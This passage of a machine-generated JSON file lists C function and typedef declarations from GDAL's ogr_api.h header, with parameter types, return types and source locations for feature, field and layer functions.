"OGR_F_GetFieldDefnRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:410:23", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRFieldDefnH" } }, { "tag": "function", "name": "OGR_F_GetFieldIndex", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:411:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_IsFieldSet", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:413:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_UnsetField", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:414:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_IsFieldNull", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:416:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_IsFieldSetAndNotNull", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:417:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_SetFieldNull", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:418:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_GetRawFieldRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:420:19", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": "OGRField" } } }, { "tag": "function", "name": "OGR_RawField_IsUnset", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:422:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRField" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_RawField_IsNull", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:423:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRField" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_RawField_SetUnset", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:424:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRField" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_RawField_SetNull", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:425:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRField" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_GetFieldAsInteger", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:427:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_GetFieldAsInteger64", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:428:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "OGR_F_GetFieldAsDouble", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:429:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "OGR_F_GetFieldAsString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:430:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_F_GetFieldAsIntegerList", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:431:20", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "function", "name": "OGR_F_GetFieldAsInteger64List", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:432:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "GIntBig" } } }, { "tag": "function", "name": "OGR_F_GetFieldAsDoubleList", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:433:23", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "function", "name": "OGR_F_GetFieldAsStringList", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:434:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "OGR_F_GetFieldAsBinary", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:435:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "GByte" } } }, { "tag": "function", "name": "OGR_F_GetFieldAsDateTime", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:436:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_GetFieldAsDateTimeEx", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:438:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pnYear", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnMonth", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnDay", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnHour", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnMinute", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pfSecond", "type": { "tag": ":pointer", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "pnTZFlag", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_SetFieldInteger", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:443:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldInteger64", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:444:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "GIntBig" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldDouble", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:445:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:446:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldIntegerList", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:447:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldInteger64List", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:448:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GIntBig" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldDoubleList", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:449:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldStringList", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:450:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldRaw", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:451:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRField" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldBinary", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:452:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GByte" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldDateTime", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:453:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFieldDateTimeEx", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:455:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_GetGeomFieldCount", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:458:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_GetGeomFieldDefnRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:459:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRGeomFieldDefnH" } }, { "tag": "function", "name": "OGR_F_GetGeomFieldIndex", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:461:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "pszName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_F_GetGeomFieldRef", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:464:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_F_SetGeomFieldDirectly", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:466:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_F_SetGeomField", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:469:27", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_F_GetFID", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:472:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "OGR_F_SetFID", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:473:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GIntBig" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_F_DumpReadable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:474:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetFrom", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:475:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_F_SetFromWithMap", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:476:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_F_GetStyleString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:478:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_F_SetStyleString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:479:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetStyleStringDirectly", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:480:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_GetStyleTable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:482:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": "OGRStyleTableH" } }, { "tag": "function", "name": "OGR_F_SetStyleTableDirectly", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:484:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_SetStyleTable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:486:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRStyleTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_GetNativeData", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:488:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_F_SetNativeData", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:489:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_GetNativeMediaType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:490:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_F_SetNativeMediaType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:491:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_FillUnsetWithDefault", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:493:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hFeat", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "bNotNullableOnly", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_F_Validate", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:496:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRFeatureH" } }, { "tag": "parameter", "name": "nValidateFlags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "bEmitError", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "OGRLayerH", "location": "/usr/include/gdal/ogr_api.h:508:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "OGRDataSourceH", "location": "/usr/include/gdal/ogr_api.h:510:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "OGRSFDriverH", "location": "/usr/include/gdal/ogr_api.h:512:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "OGR_L_GetName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:517:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_L_GetGeomType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:518:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRLayerH" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": 